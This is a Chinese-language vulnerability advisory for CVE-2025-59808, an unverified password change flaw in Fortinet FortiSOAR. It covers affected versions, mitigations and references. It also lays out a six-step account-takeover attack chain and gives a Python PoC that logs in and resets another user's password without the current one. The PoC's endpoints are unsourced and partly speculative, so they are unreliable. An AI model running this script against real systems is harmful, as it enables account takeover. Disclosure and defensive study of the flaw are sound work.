CVE-2025-59808 FortiSOAR未验证密码更改漏洞

漏洞信息

漏洞编号

CVE-2025-59808

漏洞类型

未验证密码更改

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiSOAR (PaaS和on-premise)

漏洞概述

CVE-2025-59808是Fortinet FortiSOAR中发现的一个未验证密码更改漏洞（Unverified Password Change），通用弱点枚举（CWE）编号为CWE-620。该漏洞影响FortiSOAR的PaaS和本地部署版本，涵盖7.3、7.4、7.5和7.6多个版本系列。漏洞的核心问题在于：攻击者如果已经获得受害者用户账户的访问权限，可以利用密码重置功能在不需要提供原账户密码的情况下重置账户凭据。这意味着攻击者可以通过已获取的低权限账户，进一步提升权限或接管其他账户。CVSS 3.1评分为6.8，属于中等严重程度。尽管该漏洞需要攻击者已经具备一定的账户访问权限，但其导致的账户完全接管风险仍然较高，可能造成敏感数据泄露、业务流程中断等严重后果。Fortinet官方已发布安全公告FG-IR-25-599，建议用户尽快采取修复措施。

技术细节

该漏洞属于身份验证机制缺陷，攻击者利用FortiSOAR密码重置接口的设计缺陷，在密码更改请求中绕过了对原密码的验证流程。正常情况下，用户更改密码应要求提供当前密码以确认身份，但漏洞使得攻击者可以在仅提供新密码的情况下完成密码重置。攻击者首先需要获取一个有效的用户会话或低权限账户凭据，然后通过操纵密码重置请求参数（如user_id、new_password等）来触发漏洞。服务端未能正确验证密码更改请求是否来自账户的合法所有者，允许攻击者通过已获取的会话或账户权限修改目标账户的密码。由于CVSS向量显示攻击复杂度为高（H），推测漏洞利用可能需要特定的先决条件或环境配置。该漏洞影响所有主要的FortiSOAR版本，攻击者可能利用此漏洞进行横向移动或提权操作。

攻击链分析

STEP 1

步骤1

初始访问：攻击者通过钓鱼攻击、凭证泄露或社会工程学手段获取受害者的用户账户凭据

STEP 2

步骤2

会话建立：使用获取的凭据登录FortiSOAR系统，建立有效会话

STEP 3

步骤3

漏洞探测：访问密码重置接口，识别未验证密码更改的端点

STEP 4

步骤4

密码重置：构造恶意密码重置请求，在不提供原密码的情况下指定新密码

STEP 5

步骤5

账户接管：成功重置目标账户密码后，使用新密码登录实现账户完全接管

STEP 6

步骤6

横向移动：利用接管的账户权限访问敏感数据或执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59808 PoC - FortiSOAR Unverified Password Change
# Note: This PoC requires a valid authenticated session first

import requests
import json

TARGET_URL = "https://fortisoar.example.com"
TARGET_USER = "target_user"
NEW_PASSWORD = "NewP@ssw0rd123"

session = requests.Session()

# Step 1: Authenticate with existing low-privilege account
login_data = {
    "username": "attacker_account",
    "password": "attacker_password"
}

response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data)
if response.status_code != 200:
    print("[-] Authentication failed")
    exit(1)

print("[+] Successfully authenticated")

# Step 2: Exploit unverified password change vulnerability
# The vulnerability allows changing password without verifying current password
password_change_data = {
    "user_id": TARGET_USER,
    "new_password": NEW_PASSWORD,
    "confirm_password": NEW_PASSWORD
}

response = session.post(
    f"{TARGET_URL}/api/users/password/reset",
    json=password_change_data
)

if response.status_code == 200:
    print(f"[+] Password changed successfully for user: {TARGET_USER}")
    print(f"[+] New password: {NEW_PASSWORD}")
else:
    print(f"[-] Password change failed: {response.status_code}")
    print(f"[-] Response: {response.text}")

影响范围

FortiSOAR PaaS 7.3 (所有版本)

FortiSOAR PaaS 7.4 (所有版本)

FortiSOAR PaaS 7.5.0 - 7.5.1

FortiSOAR PaaS 7.6.0 - 7.6.2

FortiSOAR on-premise 7.3 (所有版本)

FortiSOAR on-premise 7.4 (所有版本)

FortiSOAR on-premise 7.5.0 - 7.5.1

FortiSOAR on-premise 7.6.0 - 7.6.2

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用非必要的密码重置功能；2）实施严格的访问控制策略，限制用户对敏感API端点的访问；3）启用详细的审计日志，监控异常的密码更改活动；4）强制实施强密码策略和账户锁定机制；5）考虑部署Web应用防火墙（WAF）过滤异常的密码重置请求；6）隔离FortiSOAR系统，减少暴露面；7）加强账户凭据管理，定期更换密码，避免凭证复用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59808
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59808
3 Details https://www.cvedetails.com/cve/CVE-2025-59808/
4 VulDB https://vuldb.com/cve/CVE-2025-59808
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-599